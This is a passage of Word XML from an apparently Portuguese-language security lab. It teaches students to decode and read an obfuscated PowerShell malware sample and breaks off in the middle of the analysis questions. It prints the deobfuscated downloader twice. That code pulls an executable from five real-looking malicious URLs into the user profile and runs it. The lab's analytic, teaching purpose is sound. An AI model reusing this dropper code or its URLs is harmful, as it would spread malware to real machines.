        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>64, e você verá o decodificado abaixo, mas com quebra diferente, dependendo do tamanho da janela do terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6088F1F7" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>$R3ZtKC='FCams3Q';$d1mU0azd = 184';$XMzUsP='PD2Qisza';$tZTLXzZq=$env:userprofile+'\'+$d1mU0azd+'.exe';$zlBUq6='Q0HuEwi';$pTl4Jz=.('n'+'e'+'w-object') nET.W`EbC`Li`Ent;$NUzAMAR='http://agavea.com.br/font/tMfyxzMEnQ/@http://news-week.ru/2018/wvq6nzd_kywgcjzgi-273/@http://ab.fitzio.com/cgi-bin/opiFtEAsf/@http://palmbeachresortcebu.com/wp-content/uploads/t9smfqj3_blm4xo-69526194/@http://thingsmadeforyouapps.com/wp-admin/VpVOXxek/'.SPLit('@');$NOBJJj='Eo1jszRQ';foreach($j5YzrQKQ in $NUzAMAR){try{$pTl4Jz.DOwNlOADfiLe($j5YzrQKQ, $tZTLXzZq);$SHHj3v='Mpi_Cz1s';If ((.('G'+'et'+'-Item') $tZTLXzZq).LenGTh -ge 31421) {[Diagnostics.Process]::sTarT($tZTLXzZq);$s1EoklR='fL2dzmIj';break;$TQ0NStMF='mANFqY'}}catch{}}$Zi7lBM='qFLbpU'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B77EA8" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>i.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O texto ainda é um pouco difícil de ler, mas você provavelmente pode escolher alguns recursos conhecidos. Usaremos o editor de texto para facilitar a leitura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A82920E" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepNum"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Clique em </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Pesquisas</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Substituir</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E29DE35" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepNum"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Digite </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ponto e vírgula) no campo </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Pesquisar</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473E624B" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepNum"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Insira </w:t>
      </w:r>
      <w:r w:rsidRPr="00D3116C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> no campo Substituir Por.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4DC0EF" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepNum"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>4)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Marque a caixa de seleção </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Combinar com expressão regular</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EF5F5A" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepNum"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>5)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Clique em </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Substituir tudo</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E29C0F6" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepNum"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>6)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Por fim, repita as etapas acima para @. O "@" é usado como um separador para uma declaração particularmente longa. Digite </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> no campo Localizar e substitua por </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DC58DC" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O código formatado deve ficar assim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A49D24E" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>  1 $R3ZtKC='FCams3Q'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D15C0D8" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>  2 $d1mU0azd = '184'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5693F562" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>  3 $XMzUsP='PD2Qisza'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0539A56B" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>  4 $tZTLXzZq=$env:userprofile+'\'+$d1mU0azd+'.exe'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8BB42B" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>5 $zlBUq6='Q0HuEwi'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8B953B" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>  6 $pTl4Jz=.('n'+'e'+'w-object') nET.W`EbC`Li`Ent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE900CD" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>  7 $NUzAMAR='http://agavea.com.br/font/tMfyxzMEnQ/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD0A8C9" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>  8 http://news-week.ru/2018/wvq6nzd_kywgcjzgi-273/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE83204" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>  9 http://ab.fitzio.com/cgi-bin/opiFtEAsf/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD374D4" w14:textId="0FB7710F" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t> 10 http://palmbeachresortcebu.com/wp-content/uploads/t9smfqj3_blm4xo-</w:t>
      </w:r>
      <w:r w:rsidR="00AF130C" w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>69526194/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5735DDC1" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t> 11 http://thingsmadeforyouapps.com/wp-admin/VpVOXxek/'.SPLit('</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48890EF4" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t> 12 ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0F7850" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t> 13 $NOBJJj='Eo1jszRQ'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65876E73" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t> 14 foreach($j5YzrQKQ in $NUzAMAR){try{$pTl4Jz.DOwNlOADfiLe($j5YzrQKQ, $tZTLXzZq    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A5265E" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t> 15 $SHHj3v='Mpi_Cz1s'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BDAFE7" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t> 16 If ((.('G'+'et'+'-Item') $tZTLXzZq).LenGTh -ge 31421) {[Diagnostics.Process]    ::sTarT($tZTLXzZq)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4911FCE5" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t> 17 $s1EoklR='fL2dzmIj'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521FBE13" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t> 18 break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CBB36C" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t> 19 $TQ0NStMF='mANFqY'}}catch{}}$Zi7lBM='qFLb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF0BE0" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>j.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Salve o arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>text_64</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>, se desejar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296781D1" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Etapa 5: Interpretar o script de malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EC0912" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Embora o arquivo ainda seja difícil de ler porque usa grupos aleatórios de caracteres para nomes de variáveis e valores, e também tenta ofuscar comandos usando letras maiúsculas e outras erráticas, um pouco de conhecimento de programação pode ajudá-lo a ter uma ideia do que é acontecendo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3424985C" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Observe que uma série de URLs aparece no código. Envie vários deles para ANY.RUN, VirusTotal ou outro serviço para ver se são mal-intencionados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF5CA54" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Observe que o nome da variável </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF130C">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>$tZTLXzZq</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> aparece na linha quatro do código acima. Seu valor é concatenado com o texto '.exe'. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425FDF3E" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Perguntas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7304288F" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Qual é o valor atribuído a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF130C">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>$tZTLXzZq</w:t>
